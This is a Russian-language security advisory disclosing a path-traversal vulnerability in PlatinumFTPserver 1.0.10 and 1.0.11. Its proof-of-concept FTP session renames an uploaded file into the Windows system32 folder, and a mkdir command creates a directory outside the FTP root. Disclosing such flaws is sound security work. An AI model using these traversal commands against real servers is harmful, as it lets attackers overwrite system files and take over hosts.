Уязвимость обнаружена в PlatinumFTPserver. Удаленный авторизованный пользователь, включая анонимного пользователя, может просматривать и заменять файлы на сервере, которые расположены вне FTP каталога.
Сообщается, что удаленный заверенный пользователь может заменить любые файлы на системе (если у него есть права на загрузку файлов на FTP сервер). Пример:
ftp> rename cmd3.exe
To name ../../../../windows/system32/cmd2.exe
350 Command OK - waiting for name
250 File/dir renamed to \..\..\..\..\windows\system32\cmd2.exe
ftp> dir ../../../../windows/system32/cmd*
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd.exe
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd2.exe
-rwxr-xr-x 1 User Group 324608 Aug 29 18:40 cmdial32.dll
-rwxr-xr-x 1 User Group 41472 Aug 29 18:41 cmdl32.exe
-rwxr-xr-x 1 User Group 40505 Aug 18 20:00 cmdlib.wsc
226 Listing complete.
ftp: 342 bytes received in 0.00Seconds 342000.00Kbytes/sec.
ftp>
Также сообщается, что удаленный авторизованный пользователь может создать каталог на целевом сервере, который расположен вне FTP root каталога, следующей командой:
mkdir ../testing1
Уязвимость обнаружена в PlatinumFTPserver 1.0.10, 1.0.11.